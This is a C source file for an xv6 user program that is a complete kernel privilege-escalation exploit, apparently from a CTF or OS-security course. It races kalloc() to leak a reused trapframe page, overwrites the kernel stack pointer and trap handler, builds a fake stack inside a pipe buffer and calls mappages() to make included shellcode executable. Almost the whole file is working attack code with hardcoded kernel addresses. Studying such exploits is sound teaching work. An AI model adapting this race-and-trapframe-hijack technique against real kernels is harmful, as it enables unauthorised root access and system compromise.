#include "kernel/types.h"
#include "kernel/stat.h"
#include "user/user.h"

#define puts(s) printf(s "\n")

typedef union {
  int fds[2];
  struct {
    int recv_fd;
    int send_fd;
  };
} pipe_t;

#define HANDSHAKE_MAGIC 0xdeadbeef
#define PIPE_SP         (512 - (32 + 80 + 8))
// size of a page (4KB)
#define PAGE_SIZE       4096
// address of the wonky pipe
#define WONKY_PIPE_ADDR 0x87f43000
// address at which we will remap the wonky pipe buffer
#define SHELLCODE_ADDR  0xdead0000
// address of the kernel page table
#define KERNEL_PT       0x87fff000
// new trapframe->kernel_sp value
#define KERNEL_SP       (WONKY_PIPE_ADDR + PIPE_SP + 0x18)
// new trapframe->kernel_trap value
#define KERNEL_TRAP     0x8000525c
// address of mappages()+4
#define MAPPAGES_ADDR   0x80001086

// some paging flags, don't worry about it
#define PTE_V (1L << 0) // valid
#define PTE_R (1L << 1)
#define PTE_W (1L << 2)
#define PTE_X (1L << 3)
#define PTE_U (1L << 4) // user can access
#define PA2PTE(pa) ((((uint64)pa) >> 12) << 10)

// this macro marks variables as unused, so that the compiler
// doesn't complain
#define U(x) ((void)(x))

static char pipe_data[512] = {
// this is the shellcode compiled and converted into an array of bytes
#include "../shcd.c"
};

static void vuln(void) {
  // setup the registers for our call to `mappages`
  register uint64 a1 asm("a1") = SHELLCODE_ADDR;
  register uint64 a2 asm("a2") = PAGE_SIZE;
  register uint64 a3 asm("a3") = WONKY_PIPE_ADDR;
  register uint64 a4 asm("a4") = PTE_R | PTE_X | PTE_W;
  register uint64 a5 asm("a5") = KERNEL_PT;

  while (1)
    ;

  U(a5);
  U(a4);
  U(a3);
  U(a2);
  U(a1);
}

static int handshake(pipe_t* p) {
  int rc;
  uint64 my_magic, other_magic;

  my_magic = HANDSHAKE_MAGIC;
  rc = write(p->send_fd, &my_magic, sizeof(my_magic));
  if (rc < 0)
    return -1;
  rc = read(p->recv_fd, &other_magic, sizeof(other_magic));
  if (rc < sizeof(other_magic))
    return -1;

  return my_magic == other_magic;
}

static int child(pipe_t* p) {
  int rc, chld;
  char in;
  volatile uint64* alloc;

  while (1) {
    rc = handshake(p);
    if (rc <= 0) {
      puts("child: could not synchronize with parent (pipe error)");
      goto out;
    }

    // try to race kalloc() by allocating memory to the process
    alloc = (uint64*)sbrk(PAGE_SIZE);

    // read the child pid from the parent
    rc = read(p->recv_fd, &chld, sizeof(chld));
    if (rc < 0) {
      puts("child: could not communicate with parent");
      goto out;
    }

    // check if the race was successful
    // NOTE alloc[2] == trapframe->kernel_trap
    if ((alloc[2] & (uint64)~0xfffff) == 0x80000000)
      goto success;

    // if it wasn't successful, kill the child and free the memory
    kill(chld);
    sbrk(-PAGE_SIZE);
  }

  goto out;

success:
  printf("leaked pointer %p (value is %p)!\n", alloc, alloc[2]);
  // this is a sanity check, to ensure our KERNEL_PT address we found, matches
  // what the actual one (this should never fail)
  // NOTE alloc[0] == trapframe->kernel_satp
  if ((alloc[0] << 12) != KERNEL_PT) {
    puts("kernel pt address mismatch!");
    goto out;
  }

  // stop here to give some time 
  puts("press any key to continue...");
  rc = read(0, &in, sizeof(in));
  if (rc < 0) {
    puts("could not get input from user");
    goto out;
  }

  // overwrite trapframe->kernel_trap (alloc[2]) and trapframe->kernel_sp (alloc[1])
  while (1) {
    alloc[1] = KERNEL_SP;
    alloc[2] = KERNEL_TRAP;
  }

out:
  return rc;
}

static int parent(pipe_t* p) {
  int rc, chld;

  while (1) {
    rc = handshake(p);
    if (rc <= 0) {
      puts("parent: could not synchronize with parent (pipe error)");
      goto out;
    }

    // race kalloc() of trapframe
    rc = chld = fork();
    if (rc < 0) {
      puts("parent: could not fork");
      goto out;
    }

    if (chld == 0)
      vuln(); // if we're the child, go do the infinite loop
    else {
      // otherwise, wait for the child to terminate
      printf("spawned new child %d\n", chld);
      rc = write(p->send_fd, &chld, sizeof(chld));
      if (rc < 0) {
        puts("parent: could not communicate with child");
        goto out;
      }
      wait(&rc);
    }
  }

out:
  if (chld > 0) {
    kill(chld);
    wait(&rc);
  }
  return rc;
}

#define SPOFF(off) ((uint64*)&pipe_data[PIPE_SP + (off)])

int main(int argc, char *argv[])
{
  int rc, chld;
  pipe_t p_chld, p_prnt, p_data;

  // the wonky pipe :D
  rc = pipe(p_data.fds);
  if (rc < 0) {
    puts("could not create data pipe");
    goto out;
  }

  // setup the fake stack
  *SPOFF(24) = MAPPAGES_ADDR;
  // NOTE we need to add 0x18 to skip over the spinlock member in
  // the pipe struct
  // 
  // struct pipe {
  //   struct spinlock lock; <-- we need to skip this (24 bytes = 0x18 bytes)
  //   char data[PIPESIZE];  <-- this is where we're writing our fake stack and shellcode
  //   uint nread;     // number of bytes read
  //   uint nwrite;    // number of bytes written
  //   int readopen;   // read fd is still open
  //   int writeopen;  // write fd is still open
  // };
  //
  *SPOFF(32 + 72) = SHELLCODE_ADDR + 0x18;

  // write fake stack + shellcode to the pipe's buffer
  rc = write(p_data.send_fd, pipe_data, sizeof(pipe_data));
  if (rc < 0) {
    puts("could not write data to data pipe");
    goto out;
  }

  rc = pipe(p_chld.fds);
  if (rc < 0) {
    puts("could not create child pipe");
    goto out;
  }
  
  rc = pipe(p_prnt.fds);
  if (rc < 0) {
    puts("could not create parent pipe");
    goto out;
  }
  
  rc = chld = fork();
  if (rc < 0) {
    puts("could not fork");
    goto out;
  }

  if (rc == 0) {
    close(p_chld.send_fd);
    close(p_prnt.recv_fd);
    p_chld.send_fd = p_prnt.send_fd;
    rc = child(&p_chld);
  }
  else {
    close(p_prnt.send_fd);
    close(p_chld.recv_fd);
    p_prnt.send_fd = p_chld.send_fd;
    rc = parent(&p_prnt);
  }

out:
  exit(rc);
}
